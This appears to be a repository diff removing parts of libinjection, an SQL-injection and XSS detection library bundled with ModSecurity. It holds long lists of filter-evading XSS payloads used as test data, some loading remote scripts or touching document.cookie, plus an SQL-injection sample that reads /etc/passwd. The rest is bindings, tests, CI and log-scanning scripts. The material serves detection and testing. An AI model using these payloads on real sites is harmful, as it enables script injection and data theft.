15) <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
18) <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
19) <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
20) </script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
21) <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
22) <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
23) <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
24) http://www.google<script .com>alert(document.location)</script
25) <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
26) <img/src=@&#32;&#13; onerror = prompt('&#49;')
27) <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
29) </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
30) &#00;</form><input type&#61;"date" onfocus="alert(1)">
31) <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
33) <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
34) <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
35) <script ~~~>alert(0%250)</script ~~~>
36) <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
37) <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
39) &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
40) &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
41) <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
43) <iframe/%00/ src=javaSCRIPT&colon;alert(1)
44) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
47) </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
48) <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
51) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
52) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
53) <iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)">
54) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
57) <var onmouseover="prompt(1)">On Mouse Over</var>
58) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
59) <img src="/" =_=" title="onerror='prompt(1)'">
60) <%25<!--'%25><script>alert(1);</script -->
61) <script src="data:text/javascript,alert(1)"></script>
62) <iframe/src \/\/onload = prompt(1)
63) <iframe/onreadystatechange=alert(1)
64) <svg/onload=alert(1)
65) <input value=<><iframe/src=javascript:confirm(1)
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
67) http://www.<script>alert(1)</script .com
68) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
69) <svg><script ?>alert(1)
70) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
71) <img src=`xx:xx`onerror=alert(1)>
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
73) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
76) <svg contentScriptType=text/vbs><script>MsgBox+1
77) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
80) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
81) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
82) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
83) <script>+-+-1-+-+alert(1)</script>
84) <body/onload=&lt;!--&gt;&#10alert(1)>
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
86) <img src ?itworksonchrome?\/onerror = alert(1)
87) <svg><script>//&NewLine;confirm(1);</script </svg>
88) <svg><script onlypossibleinopera:-)> alert(1)
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
90) <script x> alert(1) </script 1=2
91) <div/onmouseover='alert(1)'> style="x:">
# unable to reproduce in IE8 or IE9
#92) <--`<img/src=` onerror=alert(1)> --!>
93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
94) <div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)" onclick="alert(1)">x</button>
95) "><img src=x onerror=window.open('https://www.google.com/');>
96) <form><button formaction=javascript&colon;alert(1)>CLICKME
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

57
src/deps/src/ModSecurity/others/libinjection/data/xss-soaj1664ashar.txt
View File

@ -1,57 +0,0 @@
#
# Misc XSS awesomeness from soaj1664ashar feed
# https://twitter.com/soaj1664ashar
#
# https://twitter.com/soaj1664ashar/status/424961050258063360
# 2:46 AM - 20 Jan 2014
<iframe/onload=action=/confir/.source+'m';eval(action)(1)>
# https://twitter.com/soaj1664ashar/status/418454103895728128
# 3:50 AM - 2 Jan 2014
<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->
# https://twitter.com/soaj1664ashar/status/418163175788265472/
# 8:34 AM - 1 Jan 2014 :-)
><img src=http://i.imgur.com/ISxZ5dd.jpg onmouseover=confirm(/Happy_New_Year_2014/)>
# https://twitter.com/soaj1664ashar/status/416613093490163712
# Dec 28, 2013
# appears to be specific for a sanitization filter which alters the input
# into an XSS-able form.
#<form/action=ja&Tab;vascr&Tab;ipt&colon;confirm(document.cookie)> <button/type=submit>
# https://twitter.com/soaj1664ashar/status/407438076118462464
# 6:16 PM - 2 Dec 2013
<style/onload = !-alert&#x28;1&#x29;>
# https://twitter.com/soaj1664ashar/status/407086397493747712
# Dec 1, 2013
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
# https://twitter.com/soaj1664ashar/status/400335443805237248
# not sure who is author
# FF specific bug
# Nov 13, 2013
<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+" style="FONT-SIZE: 1000pt; FONT-FAMILY: Comic Sans MS; position:absolute;top:0;left:0;width:1000;height:1000;opacity:0">ClickMe</a>
# https://twitter.com/soaj1664ashar/status/400257634449637376
<svg><;(noitacol)mrifnoc=daolno ;howthehellitworks`=wtf>`
# https://twitter.com/soaj1664ashar/status/400257634449637376
# http://jsfiddle.net/DH8wM/10/
<svg><GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
# https://twitter.com/soaj1664ashar/status/396307604734881792
"><img src=x onerror=confirm(1);>
#&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
# https://twitter.com/soaj1664ashar/status/385461391366168576
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
# https://twitter.com/soaj1664ashar/status/367350377894518784
# http://pastebin.com/TVH8t5bQ
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(document.cookie)</script>"><img/id="confirm&lpar;1&#x29;"/alt="/"src="/"onerror=eval(id&#x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
# If a site has length restriction on input field then use chunk of your choice from the above vector :P

1204
src/deps/src/ModSecurity/others/libinjection/data/xss-xenotix.txt
View File

File diff suppressed because it is too large Load Diff

33
src/deps/src/ModSecurity/others/libinjection/go/main.go
View File

@ -1,33 +0,0 @@
/*
* Copyright (c) 2013 Radolsaw Wesolowski
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
*/
package main
/*
#cgo CFLAGS: -I./libinjection
#cgo LDFLAGS: -L./libinjection -linjection
#include "libinjection.h"
#include "libinjection_sqli.h"
*/
import "C"
import (
"bytes"
"fmt"
"unsafe"
)
func main() {
sqlinjection := "asdf asd ; -1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
var out [8]C.char
pointer := (*C.char)(unsafe.Pointer(&out[0]))
if found := C.libinjection_sqli(C.CString(sqlinjection), C.size_t(len(sqlinjection)), pointer); found == 1 {
output := C.GoBytes(unsafe.Pointer(&out[0]), 8)
fmt.Printf("sqli with fingerprint of '%s'\n", string(output[:bytes.Index(output, []byte{0})]))
}
}

1
src/deps/src/ModSecurity/others/libinjection/lua/.gitignore vendored
View File

@ -1 +0,0 @@
lua-TestMore

41
src/deps/src/ModSecurity/others/libinjection/lua/data2lua.py
View File

@ -1,41 +0,0 @@
#!/usr/bin/env python
#
# Copyright 2012, 2013 Nick Galbreath
# nickg@client9.com
# BSD License -- see COPYING.txt for details
#
"""
Converts a libinjection JSON data file to a C header (.h) file
"""
def toc(obj):
""" main routine """
if False:
print 'fingerprints = {'
for fp in sorted(obj[u'fingerprints']):
print "['{0}']='X',".format(fp)
print '}'
words = {}
keywords = obj['keywords']
for k,v in keywords.iteritems():
words[str(k)] = str(v)
for fp in list(obj[u'fingerprints']):
fp = '0' + fp.upper()
words[str(fp)] = 'F';
print 'words = {'
for k in sorted(words.keys()):
#print "['{0}']='{1}',".format(k, words[k])
print "['{0}']={1},".format(k, ord(words[k]))
print '}'
return 0
if __name__ == '__main__':
import sys
import json
sys.exit(toc(json.load(sys.stdin)))

26
src/deps/src/ModSecurity/others/libinjection/lua/generate_lua_fingerprints.py
View File

@ -1,26 +0,0 @@
#!/usr/bin/env python
"""
Generates a Lua table of fingerprints.
One can then add, turn off or delete fingerprints from lua.
"""
def make_lua_table(obj):
"""
Generates table. Fingerprints don't contain any special chars
so they don't need to be escaped. The output may be
sorted but it is not required.
"""
fp = obj[u'fingerprints']
print("sqlifingerprints = {")
for f in fp:
print(' ["{0}"]=true,'.format(f))
print("}")
return 0
if __name__ == '__main__':
import sys
import json
with open('../c/sqlparse_data.json', 'r') as fd:
make_lua_table(json.load(fd))

62
src/deps/src/ModSecurity/others/libinjection/lua/libinjection.i
View File

@ -1,62 +0,0 @@
/* libinjection.i SWIG interface file */
%module libinjection
%{
#include "libinjection.h"
#include "libinjection_sqli.h"
static char libinjection_lua_lookup_word(sfilter* sf, int lookup_type,
const char* s, size_t len)
{
lua_State* L = (lua_State*) sf->userdata;
//char* luafunc = (char *)lua_tostring(L, 2);
lua_getglobal(L, "lookup_word");
SWIG_NewPointerObj(L, (void*)sf, SWIGTYPE_p_libinjection_sqli_state, 0);
lua_pushnumber(L, lookup_type);
lua_pushlstring(L, s, len);
if (lua_pcall(L, 3, 1, 0)) {
printf("Something bad happened");
}
const char* result = lua_tostring(L, -1);
if (result == NULL) {
return 0;
} else {
return result[0];
}
}
%}
%include "typemaps.i"
// The C functions all start with 'libinjection_' as a namespace
// We don't need this since it's in the libinjection table
// i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli
//
%rename("%(strip:[libinjection_])s") "";
%typemap(in) (ptr_lookup_fn fn, void* userdata) {
if (lua_isnil(L, 1)) {
arg2 = NULL;
arg3 = NULL;
} else {
arg2 = libinjection_lua_lookup_word;
arg3 = (void *) L;
}
}
%typemap(out) stoken_t [ANY] {
int i;
lua_newtable(L);
for (i = 0; i < $1_dim0; i++) {
lua_pushnumber(L, i+1);
SWIG_NewPointerObj(L, (void*)(& $1[i]), SWIGTYPE_p_stoken_t,0);
lua_settable(L, -3);
}
SWIG_arg += 1;
}
%include "libinjection.h"
%include "libinjection_sqli.h"

107
src/deps/src/ModSecurity/others/libinjection/lua/luatest.lua
View File

@ -1,107 +0,0 @@
require 'libinjection'
-- dofile('sqlifingerprints.lua')
-- silly callback that just calls back into C
-- identical to libinjection_is_sqli(sql_state, string_input, nil)
--
function check_pattern_c(sqlstate)
return(libinjection.sqli_blacklist(sqlstate) and
libinjection.sqli_not_whitelist(sqlstate))
end
-- half lua / half c checker
-- use lua based fingerprint lookup and still uses C code
-- to eliminate false positives
function check_pattern(sqlstate)
fp = sqlstate.pat
if sqlifingerprints[fp] == true then
-- try to eliminate certain false positives
return(libinjection.sqli_not_whitelist(sqlstate))
else
-- not sqli
return 0
end
end
function lookup_word(sqlstate, ltype, word)
if ltype == 'X' then
return words['0' .. word:upper()]
else
return words[word:upper()]
end
end
dofile('words.lua')
-- THIS USES BUILT IN FINGERPRINTS
-- (with last arg of 'nil')
sqli = '1 union select * from table'
sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, sqli, sqli:len(), 0)
print(libinjection.is_sqli(sql_state))
print(sql_state.pat)
print('----')
inputs = {
"123 LIKE -1234.5678E+2;",
"APPLE 1 9.123 'FOO' \"BAR\"",
"/* BAR */ UNION ALL SELECT (2,3,4)",
"1 || COS(+0X04) --FOOBAR",
"dog apple @cat banana bar",
"dog apple cat \"banana \'bar",
"102 TABLE CLOTH"
}
function benchmark(imax)
local x,s
local t0 = os.clock()
local sql_state = libinjection.sqli_state()
for x = 0, imax do
s = inputs[(x % 7) + 1]
libinjection.sqli_init(sql_state, s, s:len(), 0)
libinjection.is_sqli(sql_state)
end
local t1 = os.clock()
print( imax / (t1-t0) )
end
function benchmark_callback(imax)
local x,s
local t0 = os.clock()
local sql_state = libinjection.sqli_state()
for x = 0, imax do
s = inputs[(x % 7) + 1]
libinjection.sqli_init(sql_state, s, s:len(), 0)
libinjection.sqli_callback(sql_state, 'lookup_word');
libinjection.is_sqli(sql_state)
end
local t1 = os.clock()
print( imax / (t1-t0) )
end
benchmark(1000000)
benchmark_callback(1000000)
-- THIS USES LUA FINGERPRINTS via 'check_pattern' function above
if 0 then
for x = 1,2 do
ok = libinjection.is_sqli(sql_state)
if ok == 1 then
print(sql_state.pat)
vec = sql_state.tokenvec
for i = 1, sql_state.pat:len() do
print(vec[i].type, vec[i].val)
end
end
end
end

74
src/deps/src/ModSecurity/others/libinjection/lua/make_test.py
View File

@ -1,74 +0,0 @@
#!/usr/bin/env python
import glob
import sys
def readtestdata(filename):
"""
Read a test file and split into components
"""
state = None
info = {
'--TEST--': '',
'--INPUT--': '',
'--EXPECTED--': ''
}
for line in open(filename, 'r'):
line = line.rstrip()
if line in ('--TEST--', '--INPUT--', '--EXPECTED--'):
state = line
elif state:
info[state] += line + '\n'
# remove last newline from input
info['--INPUT--'] = info['--INPUT--'][0:-1]
return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip())
def luaescape(s):
return s.strip().replace("\\", "\\\\").replace("\n", "\\n").replace("'", "\\'")
def genluatest(fname, data):
# TBD: change to python os.path
name = fname.split('/')[-1]
if name.startswith('test-tokens-'):
testname = 'test_tokens'
extra = "\\n"
elif name.startswith('test-tokens_mysql'):
testname = 'test_tokens_mysql'
extra = "\\n"
elif name.startswith('test-folding-'):
testname = 'test_folding'
extra = "\\n"
elif name.startswith('test-sqli-'):
testname = 'test_fingerprints'
extra = ''
else:
#print "IGNORING: " + name
return
name = name.replace('.txt', '')
print "is({0}('{1}'),\n '{2}{3}',\n '{4}')\n".format(
testname,
luaescape(data[1]),
extra,
luaescape(data[2]),
name
)
def test2lua(fname):
data = readtestdata(fname)
genluatest(fname, data)
def main():
print "require 'testdriver'\n"
files = glob.glob('../tests/test-*.txt')
print "plan({0})\n".format(len(files))
for testfile in sorted(files):
test2lua(testfile)
if __name__ == '__main__':
main()

90
src/deps/src/ModSecurity/others/libinjection/lua/testdriver.lua
View File

@ -1,90 +0,0 @@
require 'libinjection'
require 'Test.More'
require 'Test.Builder.Tester'
function trim(s)
return s:find'^%s*$' and '' or s:match'^%s*(.*%S)'
end
function print_token_string(tok)
local out = ''
if tok.str_open ~= '\0' then
out = out .. tok.str_open
end
out = out .. tok.val
if tok.str_close ~= '\0' then
out = out .. tok.str_close
end
return trim(out)
end
function print_token(tok)
local out = ''
out = out .. tok.type
out = out .. ' '
if tok.type == 's' then
out = out .. print_token_string(tok)
elseif tok.type == 'v' then
if tok.count == 1 then
out = out .. '@'
elseif tok.count == 2 then
out = out .. '@@'
end
out = out .. print_token_string(tok)
else
out = out .. tok.val
end
return '\n' .. trim(out)
end
function test_tokens(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(),
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
while (libinjection.sqli_tokenize(sql_state) == 1) do
out = out .. print_token(sql_state.current)
end
return out
end
function test_tokens_mysql(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(),
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_MYSQL)
while (libinjection.sqli_tokenize(sql_state) == 1) do
out = out .. print_token(sql_state.current)
end
return out
end
function test_folding(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(), 0)
libinjection.sqli_fingerprint(sql_state,
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
for i = 1, sql_state.fingerprint:len() do
-- c array is still 0 based
out = out .. print_token(libinjection.sqli_get_token(sql_state, i-1))
end
-- hack for when there is no output
if out == '' then
out = '\n'
end
return out
end
function test_fingerprints(input)
local out = ''
local sql_state = libinjection.sqli_state()
libinjection.sqli_init(sql_state, input, input:len(), 0)
local issqli = libinjection.is_sqli(sql_state)
if issqli == 1 then
out = sql_state.fingerprint
end
return out
end

85
src/deps/src/ModSecurity/others/libinjection/make-ci.sh
View File

@ -1,85 +0,0 @@
#!/bin/sh
# this is the script that runs in CI
set -e
DASH=----------------------
echo $DASH
gcc --version
echo $DASH
make clean
make -e check
make clean
#
# Code coverage
#
export CC=gcc
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
echo $DASH
echo "Generating code coverage"
echo "CFLAGS=$CFLAGS"
echo
make -e check
if [ -n "$COVERALLS_REPO_TOKEN" ] ; then
echo "uploading to coveralls"
coveralls \
--gcov-options '\-lp' \
--exclude-pattern '.*h' \
--exclude src/reader.c \
--exclude src/example1.c \
--exclude src/fptool.c \
--exclude src/test_speed_sqli.c \
--exclude src/test_speed_xss.c \
--exclude src/testdriver.c \
--exclude src/html5_cli.c \
--exclude src/sqli_cli.c \
--exclude python
fi
echo
unset CC
unset CFLAGS
echo
echo $DASH
clang --version
echo $DASH
./configure-clang.sh
echo
echo $DASH
echo "CLANG STATIC ANALYZER"
echo
cd src
make analyze
echo
echo $DASH
cppcheck --version
echo
cppcheck --std=c89 \
--enable=all \
--inconclusive \
--suppress=variableScope \
--suppress=missingIncludeSystem \
--quiet \
--error-exitcode=1 \
--template='{file}:{line} {id} {severity} {message}' \
.
echo "passed"
echo $DASH
export CFLAGS="-Wall -Wextra -Werror -pedantic -ansi -g -O1"
export VALGRIND="valgrind --gen-suppressions=no --leak-check=full --show-leak-kinds=all --read-var-info=yes --error-exitcode=1 --track-origins=yes --suppressions=/build/src/alpine.supp"
echo "GCC + VALGRIND"
echo $VALGRIND
echo
make clean
make -e check
unset VALGRIND
unset CFLAGS
echo
echo
echo "Done!"

28
src/deps/src/ModSecurity/others/libinjection/misc/gittag.sh
View File

@ -1,28 +0,0 @@
#!/bin/bash
set -e
# automated basic git tagging
# 1) edit the version number in
# c/libinjection_sqli.c
# pyton/setup.py
# 2) git add and commit
# 3) run this
# 4) done!
#
# get tag number
TAG=`grep 'LIBINJECTION_VERSION' ../c/libinjection_sqli.c | awk -F '"' '{print $2}' | tr -d '[[:space:]]'`
TAG="v${TAG}"
echo "TAG = ${TAG}"
echo "Tagging locally"
git tag -a "${TAG}" -m ${TAG}
echo "Sharing..."
git push origin "${TAG}"
git tag
echo "DONE"

45
src/deps/src/ModSecurity/others/libinjection/misc/home.md
View File

@ -1,45 +0,0 @@
LIBINJECTION
==========================
Libinjection is a small C library to detect SQLi attacks in user input with the following goals:
* Open. Source code is on [GitHub](https://github.com/client9/libinjection/).
* Low _false-positives_. When there are high false positives, people tend to turn off any WAF or protection.
* Excellent detection of SQLi.
* High performance (currently [over 500,000 TPS](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-speed/latest/console.txt))
* Easy to test and QA
* Easy to integrate and extend
### [Try it now](/diagnostics)
### Easy to integrate
* Standard C code, and compiles as C99 and C++, with bindings to
* [Python](https://github.com/client9/libinjection/wiki/doc-sqli-python)
* [PHP](https://github.com/client9/libinjection/wiki/doc-sqli-php)
* [Lua](https://github.com/client9/libinjection/tree/master/lua)
* Small - about [1500 lines of code](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-loc/latest/console.txt) in three files
* Compiles on Linux/Unix/BSD, Mac and Windows
* No threads used and thread safe
* No recursion
* No (heap) memory allocation
* No extenal library dependencies
* [400+ unit tests](https://github.com/client9/libinjection/tree/master/tests)
* [98% code coverage](https://libinjection.client9.com/cicada/artifacts/libinjection/libinjection-coverage-unittest/latest/lcov-html/libinjection/src/index.html)
* [BSD License](https://github.com/client9/libinjection/blob/master/COPYING)
Third-Party Ports
---------------------
* [java](https://github.com/Kanatoko/libinjection-Java)
* At least two .NET ports exists
* Another python wrapper
Applications
---------------------
* [ModSecurity](http://www.modsecurity.org/) - since 2.7.4 release
* [IronBee](https://www.ironbee.com) - since May 2013
* Proprietary Honeypot
* Proprietary WAF, Russia
* Proprietary WAF, Japan

13
src/deps/src/ModSecurity/others/libinjection/misc/libinjection.svg
View File

File diff suppressed because one or more lines are too long
Side by Side

Before

Width:  |  Height:  |  Size: 944 KiB

64
src/deps/src/ModSecurity/others/libinjection/misc/logscanner.py
View File

@ -1,64 +0,0 @@
#!/usr/bin/env python
import sys
import re
import libinjection
import urllib
import urlparse
logre = re.compile(r' /diagnostics\?([^ ]+) HTTP')
notsqli = set([
'1ov',
'UEvEv',
'v',
'Uv',
'Uv,',
'UoEvE',
'1v',
'sov',
'1nn',
'UonnE',
'no1',
'Evk',
'E1k',
'E11k',
'Ek',
'Uv,Ev',
'UvEvk',
'UvEv,',
'Uvon'
])
def doline(logline):
"""
...GET /diagnostics?id=%22union+select HTTP/1.1
"""
mo = logre.search(logline)
if not mo:
return
sqli= False
fp = None
for key, val in urlparse.parse_qsl(mo.group(1)):
val = urllib.unquote(val)
extra = {}
argsqli = libinjection.detectsqli(val, extra)
if argsqli:
fp = extra['fingerprint']
print urllib.quote(val)
sqli = sqli or argsqli
if False: # and not sqli:
#print "\n---"
#print mo.group(1)
for key, val in urlparse.parse_qsl(mo.group(1)):
val = urllib.unquote(val)
extra = {}
argsqli = libinjection.detectsqli(val, extra)
if not argsqli and extra['fingerprint'] not in notsqli:
print "NO", extra['fingerprint'], mo.group(1)
print " ", val
if __name__ == '__main__':
for line in sys.stdin:
doline(line)

213
src/deps/src/ModSecurity/others/libinjection/misc/logscanner2.py
View File

@ -1,213 +0,0 @@
#!/usr/bin/env python
import datetime
import json
import sys
from urlparse import *
import urllib
import libinjection
from tornado import template
from tornado.escape import *
import re
import calendar
months = {
'Jan':'01',
'Feb':'02',
'Mar':'03',
'Apr':'04',
'May':'05',
'Jun':'06',
'Jul':'07',
'Aug':'08',
'Sep':'09',
'Oct':'10',
'Nov':'11',
'Dec':'12'
}
# "time_iso8601":"2013-08-04T03:51:18+00:00"
def parse_date(datestr):
elems = (
datestr[7:11],
months[datestr[3:6]],
datestr[0:2],
datestr[12:14],
datestr[15:17],
datestr[18:20],
)
return ( "{0}-{1}-{2}T{3}:{4}:{5}+00:00".format(*elems), calendar.timegm( [ int(i) for i in elems] ) )
apachelogre = re.compile(r'^(\S*) (\S*) (\S*) \[([^\]]+)\] \"([^"\\]*(?:\\.[^"\\]*)*)\" (\S*) (\S*) \"([^"\\]*(?:\\.[^"\\]*)*)\" \"([^"]*)\" \"([^"]*)\"')
def parse_apache(line):
mo = apachelogre.match(line)
if not mo:
return None
(time_iso, timestamp) = parse_date(mo.group(4))
try:
(method, uri, protocol) = mo.group(5).split(' ', 2)
except ValueError:
(method, uri, protocol) = ('-', '-', '-')
data = {
'remote_addr': mo.group(1),
'time_iso8601': time_iso,
'timestamp' : timestamp,
'request_protocol': protocol,
'request_method': method,
'request_uri': uri,
'request_length': '',
'request_time': '',
'status': mo.group(6),
'bytes_sent': '',
'body_bytes-sent': int(mo.group(7)),
'http_referrer': mo.group(8),
'http_user_agent': mo.group(9),
'ssl_cipher': '',
'ssl_protocol': ''
}
return data
# http://stackoverflow.com/questions/312443/how-do-you-split-a-list-into-evenly-sized-chunks-in-python
def chunks(l, n):
"""
Yield successive n-sized chunks from l.
"""
for i in xrange(0, len(l), n):
yield l[i:i+n]
def breakify(s):
output = ""
for c in chunks(s, 40):
output += c
if ' ' not in c:
output += ' '
return output
def doline(line):
line = line.replace("\\x", "%").strip()
try:
data = json.loads(line)
except ValueError, e:
data = parse_apache(line)
if data is None:
sys.stderr.write("BAD LINE: {0}\n".format(line))
return None
if not data.get('request_uri','').startswith("/diagnostics"):
return None
urlparts = urlparse(data['request_uri'])
if len(urlparts.query) == 0:
return None
qsl = [ x.split('=', 1) for x in urlparts.query.split('&') ]
target = None
for k,v in qsl:
if k == 'id':
target = v
break
if target is None:
#print "no 'id'"
return None
# part one, normal decode
target = urllib.unquote_plus(target)
# do it again, but preserve '+'
target = urllib.unquote(target)
sstate = libinjection.sqli_state()
# BAD the string created by target.encode is stored in
# sstate but not reference counted, so it can get
# deleted by python
# libinjection.sqli_init(sstate, target.encode('utf-8'), 0)
# instead make a temporary var in python
